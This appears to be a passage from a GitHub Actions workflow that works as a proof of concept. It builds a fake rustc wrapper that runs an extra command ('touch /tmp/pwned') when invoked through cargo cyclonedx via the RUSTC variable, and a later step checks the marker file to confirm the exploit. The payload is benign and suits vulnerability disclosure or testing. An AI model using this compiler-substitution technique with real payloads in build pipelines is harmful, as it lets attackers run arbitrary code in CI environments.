      - name: Generate SBOM 
        run: |
          echo '#!/bin/bash' > fake_rustc
          echo 'if [[ "$*" == *"--print=file-names"* ]]; then' >> fake_rustc
          echo '    echo "libtest.rlib"' >> fake_rustc  # Fake expected output
          echo 'else' >> fake_rustc
          echo '    echo "rustc 1.72.0 (123456789 2024-01-01)"' >> fake_rustc
          echo '    echo "binary: rustc"' >> fake_rustc
          echo '    echo "commit-hash: 123456789abcdef"' >> fake_rustc
          echo '    echo "commit-date: 2024-01-01"' >> fake_rustc
          echo '    echo "host: x86_64-unknown-linux-gnu"' >> fake_rustc
          echo '    echo "release: 1.72.0"' >> fake_rustc
          echo '    echo "LLVM version: 16.0.6"' >> fake_rustc
          echo 'fi' >> fake_rustc
          echo 'touch /tmp/pwned' >> fake_rustc  # Arbitrary command execution
          chmod +x fake_rustc
          
          RUSTC=./fake_rustc cargo cyclonedx --verbose || true  # Prevents CI failure

      - name: Check if Exploit Worked
        run: |
          if [ -f /tmp/pwned ]; then
            echo "🔥 Exploit SUCCESSFUL: Arbitrary command executed"
            exit 0
          else
            echo "❌ Exploit FAILED: No command execution detected"
            exit 1
          fi
